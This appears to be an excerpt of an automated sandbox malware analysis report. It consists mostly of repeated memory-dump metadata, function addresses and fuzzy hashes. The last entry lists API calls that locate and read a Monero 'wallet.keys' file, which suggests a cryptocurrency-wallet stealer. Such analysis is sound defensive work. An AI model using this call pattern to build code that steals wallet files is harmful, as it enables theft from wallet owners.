                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ?u{
                      • API String ID: 0-4083307101
                      • Opcode ID: 09f5691c2cecbd4d9fd9becd417a2fd5104279efe06160166284c79fc185cdb2
                      • Instruction ID: 73ecf036c505b1d77f61d4ff7477593c77c605660220f42afaf64d80e3e51b8a
                      • Opcode Fuzzy Hash: 09f5691c2cecbd4d9fd9becd417a2fd5104279efe06160166284c79fc185cdb2
                      • Instruction Fuzzy Hash: EA5134F36082089FE304AD2EEC4977AB7D6DBD4320F19863CE685C7784F97999068246
                      Function 004FD50B Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 3Ku
                      • API String ID: 0-584950876
                      • Opcode ID: e280afef244b594b11fc40de878b113a2a27a02602bb914e014f8f2f61b4649b
                      • Instruction ID: f68974a5d88f2a3715b0261b468b2e88befa80f03c0b63a369433119b28b5989
                      • Opcode Fuzzy Hash: e280afef244b594b11fc40de878b113a2a27a02602bb914e014f8f2f61b4649b
                      • Instruction Fuzzy Hash: 2131B0B360821457C2187E6EEC1473FFBD5EB94710F0A453DDBD583340E97518018796
                      Function 0064CC66 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Z?O
                      • API String ID: 0-4106869805
                      • Opcode ID: ac672161a476c67f41556be57640706346a9608956ed0017562157ca61204e41
                      • Instruction ID: 71684ca7cea970550504825fdb8256d49e2102717a937feae24f6d06f83e4ada
                      • Opcode Fuzzy Hash: ac672161a476c67f41556be57640706346a9608956ed0017562157ca61204e41
                      • Instruction Fuzzy Hash: DD315CB290C3149FE711BE59DCC1BAAFBE8FF48760F56492DDAC483610D63499508AC7
                      Function 004EAE9D Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: [3|w
                      • API String ID: 0-1452203539
                      • Opcode ID: c125e2d54b7588f723bf3169f568f1f9f168dee4ee98b91fbe83f3a1c56e45ac
                      • Instruction ID: 00c83b51404547613e5148e4036d84d408ecac78b9e04fe0d541c0fa13597abf
                      • Opcode Fuzzy Hash: c125e2d54b7588f723bf3169f568f1f9f168dee4ee98b91fbe83f3a1c56e45ac
                      • Instruction Fuzzy Hash: E6316BF3E086000FF318697EEC1877AB7D79BD0320F2B8A3DEA5493780E83989068145
                      Function 0055BCF9 Relevance: .2, Instructions: 200COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5eac85ddee855f22c6da4df2e11b276d03af0452c2aaa45a8b65961d5efb6878
                      • Instruction ID: 26d3e9ca390243345dfc5846320d0892aa0ff73a291c359f0d4f917a5f07a10c
                      • Opcode Fuzzy Hash: 5eac85ddee855f22c6da4df2e11b276d03af0452c2aaa45a8b65961d5efb6878
                      • Instruction Fuzzy Hash: C251D6F3E582109BF3045E3DDC8576AB7E5EB54320F16463DEED8D3780E93998058686
                      Function 00537AFC Relevance: .2, Instructions: 183COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f337f3ece2ec8dcebd0cf3aa82914cd24e11a373db1373b1e8922d724ebc6366
                      • Instruction ID: e87797c9772b0575f0c94b157aafcb532f1825fbfa9c7b0b5f3f42f3b4173978
                      • Opcode Fuzzy Hash: f337f3ece2ec8dcebd0cf3aa82914cd24e11a373db1373b1e8922d724ebc6366
                      • Instruction Fuzzy Hash: 5F5108F3A0C1109FF718AE19EC8177AB7E5EB94320F16493DEBD897380EA3558148796
                      Function 008561C3 Relevance: .2, Instructions: 151COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ce98a7f2e3fce2af0e64ed67d05cc89a0116494108e5174e9f1e9240556ed783
                      • Instruction ID: ab0eb0f84575a37a8c6a6f18927b85de5f92926f9726801a8dabc284d8ab22ce
                      • Opcode Fuzzy Hash: ce98a7f2e3fce2af0e64ed67d05cc89a0116494108e5174e9f1e9240556ed783
                      • Instruction Fuzzy Hash: 834119F26092149FE314AF18EC457BBBBE5EF84361F25853DEAC4C3740EA3658048696
                      Function 0054D4F8 Relevance: .1, Instructions: 148COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 982fb1d604e6618b48778b8f70488abfc8be5374fa5acd5181868f1a2e7916ad
                      • Instruction ID: 29e5d8e3665d7506da27250a40f0505cc81ccc8db6f352bc0f560cfe7c7e6555
                      • Opcode Fuzzy Hash: 982fb1d604e6618b48778b8f70488abfc8be5374fa5acd5181868f1a2e7916ad
                      • Instruction Fuzzy Hash: ED416AF3A08204ABF350A92DEC8177BB3DAEBD0310F2AC53C9B94D3744E97959058696
                      Function 0049748B Relevance: .1, Instructions: 146COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 819291e180368cbb42a35f7ad5f78001d303ed16e13b60d87e1abffaffbeac0a
                      • Instruction ID: c8349672ff784daaa4df39e3170f2d5045fae501f078110d6a1cd2a5d1c55a3f
                      • Opcode Fuzzy Hash: 819291e180368cbb42a35f7ad5f78001d303ed16e13b60d87e1abffaffbeac0a
                      • Instruction Fuzzy Hash: 22412AF3A082085BE310AE2AEC5577BB6D6EBD4330F1AC63EDA84C7784F97958054151
                      Function 00655B6A Relevance: .1, Instructions: 84COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a22c8741bf930eedfb3cbb03acd850ef64aee49d4b3ce839449eb882b3b497e7
                      • Instruction ID: 987601e3390901d124fb730abeb29472c7ce1efe25e7878b406601e15d05e6b2
                      • Opcode Fuzzy Hash: a22c8741bf930eedfb3cbb03acd850ef64aee49d4b3ce839449eb882b3b497e7
                      • Instruction Fuzzy Hash: 9D31C2B280C710DFD755AF29D8816BAFBE5EF94720F06482DDAC893620E73558908B87
                      Function 00618B3B Relevance: .1, Instructions: 84COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 57409b77370bb2236c51a928332115a8e7378151ac08ca8a4c44e90dcc1a060b
                      • Instruction ID: c7eff42bdb24adc7ff89f8815b46013d35020e6fd16954c092197086d91b8758
                      • Opcode Fuzzy Hash: 57409b77370bb2236c51a928332115a8e7378151ac08ca8a4c44e90dcc1a060b
                      • Instruction Fuzzy Hash: 0A3124B250C704AFE315BF19E88566AFBE5FF98320F16882DE6C483210E7356544DA87
                      Function 001D9750 Relevance: .0, Instructions: 15COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      Function 001D0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                        • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                        • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                        • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
